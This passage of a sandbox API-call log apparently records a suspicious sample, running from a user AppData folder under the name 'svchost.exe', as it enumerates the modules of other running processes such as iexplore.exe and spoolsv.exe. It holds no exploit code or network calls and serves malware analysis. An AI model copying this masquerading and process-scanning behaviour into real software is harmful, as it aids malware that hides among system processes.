lpmodinfo=0x243f8e8, cb=0x18 | out: lpmodinfo=0x243f8e8*(lpBaseOfDll=0x7fefb150000, SizeOfImage=0xa000, EntryPoint=0x7fefb151198)) returned 1 [0070.380] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.380] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb150000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="drprov.dll") returned 0xa [0070.391] CoTaskMemFree (pv=0xd910e0) [0070.391] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.391] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb150000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll")) returned 0x1e [0070.401] CoTaskMemFree (pv=0xd910e0) [0070.402] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb120000, lpmodinfo=0x2441aa8, cb=0x18 | out: lpmodinfo=0x2441aa8*(lpBaseOfDll=0x7fefb120000, SizeOfImage=0x22000, EntryPoint=0x7fefb121198)) returned 1 [0070.412] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.412] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb120000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntlanman.dll") returned 0xc [0070.423] CoTaskMemFree (pv=0xd910e0) [0070.424] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.424] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb120000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll")) returned 0x20 [0070.434] CoTaskMemFree (pv=0xd910e0) [0070.434] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb100000, lpmodinfo=0x2443c78, cb=0x18 | out: lpmodinfo=0x2443c78*(lpBaseOfDll=0x7fefb100000, SizeOfImage=0x1c000, EntryPoint=0x7fefb101198)) returned 1 [0070.445] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.445] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb100000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="davclnt.dll") returned 0xb [0070.456] CoTaskMemFree (pv=0xd910e0) [0070.456] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.456] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb100000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll")) returned 0x1f [0070.472] CoTaskMemFree (pv=0xd910e0) [0070.472] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb0f0000, lpmodinfo=0x2445e38, cb=0x18 | out: lpmodinfo=0x2445e38*(lpBaseOfDll=0x7fefb0f0000, SizeOfImage=0xa000, EntryPoint=0x7fefb0f4938)) returned 1 [0070.485] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.485] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb0f0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="DAVHLPR.dll") returned 0xb [0070.496] CoTaskMemFree (pv=0xd910e0) [0070.496] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.496] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb0f0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\DAVHLPR.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll")) returned 0x1f [0070.507] CoTaskMemFree (pv=0xd910e0) [0070.507] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef77d0000, lpmodinfo=0x2447ff8, cb=0x18 | out: lpmodinfo=0x2447ff8*(lpBaseOfDll=0x7fef77d0000, SizeOfImage=0x13c000, EntryPoint=0x7fef77d197c)) returned 1 [0070.518] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.518] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef77d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="werconcpl.dll") returned 0xd [0070.528] CoTaskMemFree (pv=0xd910e0) [0070.529] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.529] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef77d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll")) returned 0x21 [0070.540] CoTaskMemFree (pv=0xd910e0) [0070.540] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef7780000, lpmodinfo=0x244a1c8, cb=0x18 | out: lpmodinfo=0x244a1c8*(lpBaseOfDll=0x7fef7780000, SizeOfImage=0x43000, EntryPoint=0x7fef77a1b50)) returned 1 [0070.551] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.551] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef7780000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="framedynos.dll") returned 0xe [0070.562] CoTaskMemFree (pv=0xd910e0) [0070.563] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.563] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef7780000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")) returned 0x22 [0070.573] CoTaskMemFree (pv=0xd910e0) [0070.573] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6f40000, lpmodinfo=0x244c398, cb=0x18 | out: lpmodinfo=0x244c398*(lpBaseOfDll=0x7fef6f40000, SizeOfImage=0x19000, EntryPoint=0x7fef6f5077c)) returned 1 [0070.584] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.584] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6f40000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wercplsupport.dll") returned 0x11 [0070.596] CoTaskMemFree (pv=0xd910e0) [0070.596] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.596] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6f40000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wercplsupport.dll" (normalized: "c:\\windows\\system32\\wercplsupport.dll")) returned 0x25 [0070.607] CoTaskMemFree (pv=0xd910e0) [0070.607] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6f30000, lpmodinfo=0x244e578, cb=0x18 | out: lpmodinfo=0x244e578*(lpBaseOfDll=0x7fef6f30000, SizeOfImage=0xb000, EntryPoint=0x7fef6f35740)) returned 1 [0070.618] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.618] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6f30000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="hcproviders.dll") returned 0xf [0070.630] CoTaskMemFree (pv=0xd910e0) [0070.630] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.630] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6f30000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll")) returned 0x23 [0070.641] CoTaskMemFree (pv=0xd910e0) [0070.641] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6eb0000, lpmodinfo=0x2450748, cb=0x18 | out: lpmodinfo=0x2450748*(lpBaseOfDll=0x7fef6eb0000, SizeOfImage=0x73000, EntryPoint=0x7fef6f0c7f8)) returned 1 [0070.651] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.651] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6eb0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ieproxy.dll") returned 0xb [0070.663] CoTaskMemFree (pv=0xd910e0) [0070.663] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.663] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6eb0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files\\internet explorer\\ieproxy.dll")) returned 0x2e [0070.675] CoTaskMemFree (pv=0xd910e0) [0070.675] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef32a0000, lpmodinfo=0x2452928, cb=0x18 | out: lpmodinfo=0x2452928*(lpBaseOfDll=0x7fef32a0000, SizeOfImage=0x1f000, EntryPoint=0x7fef32a57b8)) returned 1 [0070.687] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.687] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef32a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="thumbcache.dll") returned 0xe [0070.698] CoTaskMemFree (pv=0xd910e0) [0070.698] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.698] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef32a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll")) returned 0x22 [0070.709] CoTaskMemFree (pv=0xd910e0) [0070.709] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef2ff0000, lpmodinfo=0x2454af8, cb=0x18 | out: lpmodinfo=0x2454af8*(lpBaseOfDll=0x7fef2ff0000, SizeOfImage=0xd7000, EntryPoint=0x7fef2ff1074)) returned 1 [0070.721] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.721] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef2ff0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SearchFolder.dll") returned 0x10 [0070.732] CoTaskMemFree (pv=0xd910e0) [0070.732] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.732] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef2ff0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SearchFolder.dll" (normalized: "c:\\windows\\system32\\searchfolder.dll")) returned 0x24 [0070.744] CoTaskMemFree (pv=0xd910e0) [0070.744] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef3260000, lpmodinfo=0x2456cd8, cb=0x18 | out: lpmodinfo=0x2456cd8*(lpBaseOfDll=0x7fef3260000, SizeOfImage=0x3b000, EntryPoint=0x7fef3261238)) returned 1 [0070.756] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.756] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef3260000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MLANG.dll") returned 0x9 [0070.769] CoTaskMemFree (pv=0xd910e0) [0070.769] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.769] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef3260000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MLANG.dll" (normalized: "c:\\windows\\system32\\mlang.dll")) returned 0x1d [0070.784] CoTaskMemFree (pv=0xd910e0) [0070.784] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef26a0000, lpmodinfo=0x2458e98, cb=0x18 | out: lpmodinfo=0x2458e98*(lpBaseOfDll=0x7fef26a0000, SizeOfImage=0xc6000, EntryPoint=0x7fef26af220)) returned 1 [0070.800] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.800] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef26a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MsftEdit.dll") returned 0xc [0070.816] CoTaskMemFree (pv=0xd910e0) [0070.816] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.816] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef26a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MsftEdit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll")) returned 0x20 [0070.831] CoTaskMemFree (pv=0xd910e0) [0070.831] CloseHandle (hObject=0x214) returned 1 [0070.865] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0070.866] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c4) returned 0x214 [0070.866] EnumProcessModules (in: hProcess=0x214, lphModule=0x245f228, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x245f228, lpcbNeeded=0x23ee40) returned 1 [0070.867] GetModuleInformation (in: hProcess=0x214, hModule=0xf00000, lpmodinfo=0x245f498, cb=0x18 | out: lpmodinfo=0x245f498*(lpBaseOfDll=0xf00000, SizeOfImage=0xa6000, EntryPoint=0xf01c9a)) returned 1 [0070.867] CoTaskMemAlloc (cb=0x804) returned 0xd92410 [0070.867] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xf00000, lpBaseName=0xd92410, nSize=0x800 | out: lpBaseName="iexplore.exe") returned 0xc [0070.868] CoTaskMemFree (pv=0xd92410) [0070.868] CoTaskMemAlloc (cb=0x804) returned 0xd92410 [0070.868] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xf00000, lpFilename=0xd92410, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe")) returned 0x35 [0070.868] CoTaskMemFree (pv=0xd92410) [0070.868] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x24616c8, cb=0x18 | out: lpmodinfo=0x24616c8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0070.869] CoTaskMemAlloc (cb=0x804) returned 0xd92410 [0070.869] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd92410, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0070.869] CoTaskMemFree (pv=0xd92410) [0070.869] CoTaskMemAlloc (cb=0x804) returned 0xd92410 [0070.869] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd92410, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0070.870] CoTaskMemFree (pv=0xd92410) [0070.870] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x2463888, cb=0x18 | out: lpmodinfo=0x2463888*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0070.870] CoTaskMemAlloc (cb=0x804) returned 0xd92410 [0070.870] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd92410, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0070.871] CoTaskMemFree (pv=0xd92410) [0070.871] CoTaskMemAlloc (cb=0x804) returned 0xd92410 [0070.871] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd92410, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0070.872] CoTaskMemFree (pv=0xd92410) [0070.872] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x2465a48, cb=0x18 | out: lpmodinfo=0x2465a48*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0070.872] CoTaskMemAlloc (cb=0x804) returned 0xd92410 [0070.872] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd92410, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0070.873] CoTaskMemFree (pv=0xd92410) [0070.874] CoTaskMemAlloc (cb=0x804) returned 0xd92410 [0070.874] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd92410, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0070.874] CoTaskMemFree (pv=0xd92410) [0070.874] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x2467c18, cb=0x18 | out: lpmodinfo=0x2467c18*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0070.875] CoTaskMemAlloc (cb=0x804) returned 0xd92410 [0070.875] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd92410, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0070.876] CoTaskMemFree (pv=0xd92410) [0070.876] CoTaskMemAlloc (cb=0x804) returned 0xd92410 [0070.876] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd92410, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0070.877] CoTaskMemFree (pv=0xd92410) [0070.877] CloseHandle (hObject=0x214) returned 1 [0070.878] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0070.878] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb60) returned 0x214 [0070.878] EnumProcessModules (in: hProcess=0x214, lphModule=0x246a338, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x246a338, lpcbNeeded=0x23ee40) returned 1 [0070.879] GetModuleInformation (in: hProcess=0x214, hModule=0xcf0000, lpmodinfo=0x246a5a8, cb=0x18 | out: lpmodinfo=0x246a5a8*(lpBaseOfDll=0xcf0000, SizeOfImage=0x17000, EntryPoint=0xcf14a1)) returned 1 [0070.879] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.879] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xcf0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="fling.exe") returned 0x9 [0070.880] CoTaskMemFree (pv=0xd910e0) [0070.880] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.880] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xcf0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Internet Explorer\\fling.exe" (normalized: "c:\\program files (x86)\\internet explorer\\fling.exe")) returned 0x32 [0070.880] CoTaskMemFree (pv=0xd910e0) [0070.880] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x246c7c8, cb=0x18 | out: lpmodinfo=0x246c7c8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0070.881] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.881] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0070.881] CoTaskMemFree (pv=0xd910e0) [0070.881] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.881] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0070.882] CoTaskMemFree (pv=0xd910e0) [0070.882] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x246e988, cb=0x18 | out: lpmodinfo=0x246e988*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0070.883] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.883] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0070.883] CoTaskMemFree (pv=0xd910e0) [0070.883] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.883] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0070.884] CoTaskMemFree (pv=0xd910e0) [0070.884] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x2470b48, cb=0x18 | out: lpmodinfo=0x2470b48*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0070.885] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.885] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0070.886] CoTaskMemFree (pv=0xd910e0) [0070.886] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.886] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0070.886] CoTaskMemFree (pv=0xd910e0) [0070.886] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x2472d18, cb=0x18 | out: lpmodinfo=0x2472d18*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0070.887] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.887] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0070.888] CoTaskMemFree (pv=0xd910e0) [0070.888] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.888] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0070.889] CoTaskMemFree (pv=0xd910e0) [0070.889] CloseHandle (hObject=0x214) returned 1 [0070.890] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0070.891] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x910) returned 0x214 [0070.891] EnumProcessModules (in: hProcess=0x214, lphModule=0x2475450, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x2475450, lpcbNeeded=0x23ee40) returned 1 [0070.891] GetModuleInformation (in: hProcess=0x214, hModule=0xc80000, lpmodinfo=0x24756c0, cb=0x18 | out: lpmodinfo=0x24756c0*(lpBaseOfDll=0xc80000, SizeOfImage=0x17000, EntryPoint=0xc814a1)) returned 1 [0070.892] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.892] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xc80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="spcwin.exe") returned 0xa [0070.892] CoTaskMemFree (pv=0xd910e0) [0070.892] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.892] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xc80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Mozilla Firefox\\spcwin.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\spcwin.exe")) returned 0x31 [0070.893] CoTaskMemFree (pv=0xd910e0) [0070.893] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x24778e0, cb=0x18 | out: lpmodinfo=0x24778e0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0070.893] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.893] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0070.894] CoTaskMemFree (pv=0xd910e0) [0070.894] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.894] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0070.895] CoTaskMemFree (pv=0xd910e0) [0070.895] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x2479aa0, cb=0x18 | out: lpmodinfo=0x2479aa0*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0070.895] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.895] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0070.896] CoTaskMemFree (pv=0xd910e0) [0070.896] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.896] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0070.897] CoTaskMemFree (pv=0xd910e0) [0070.897] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x247bc60, cb=0x18 | out: lpmodinfo=0x247bc60*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0070.897] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.897] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0070.898] CoTaskMemFree (pv=0xd910e0) [0070.898] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.898] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0070.899] CoTaskMemFree (pv=0xd910e0) [0070.899] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x247de30, cb=0x18 | out: lpmodinfo=0x247de30*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0070.899] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.899] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0070.900] CoTaskMemFree (pv=0xd910e0) [0070.900] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.900] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0070.901] CoTaskMemFree (pv=0xd910e0) [0070.901] CloseHandle (hObject=0x214) returned 1 [0070.902] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0070.903] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x470) returned 0x214 [0070.903] EnumProcessModules (in: hProcess=0x214, lphModule=0x2480550, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x2480550, lpcbNeeded=0x23ee40) returned 1 [0070.909] EnumProcessModules (in: hProcess=0x214, lphModule=0x2480768, cb=0x400, lpcbNeeded=0x23ee40 | out: lphModule=0x2480768, lpcbNeeded=0x23ee40) returned 1 [0070.913] GetModuleInformation (in: hProcess=0x214, hModule=0xff480000, lpmodinfo=0x2480bd8, cb=0x18 | out: lpmodinfo=0x2480bd8*(lpBaseOfDll=0xff480000, SizeOfImage=0x8c000, EntryPoint=0xff48f1e0)) returned 1 [0070.914] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.914] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xff480000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="spoolsv.exe") returned 0xb [0070.914] CoTaskMemFree (pv=0xd910e0) [0070.915] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.915] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xff480000, lpFilename=0xd910e0, nSize=0x800 | out: 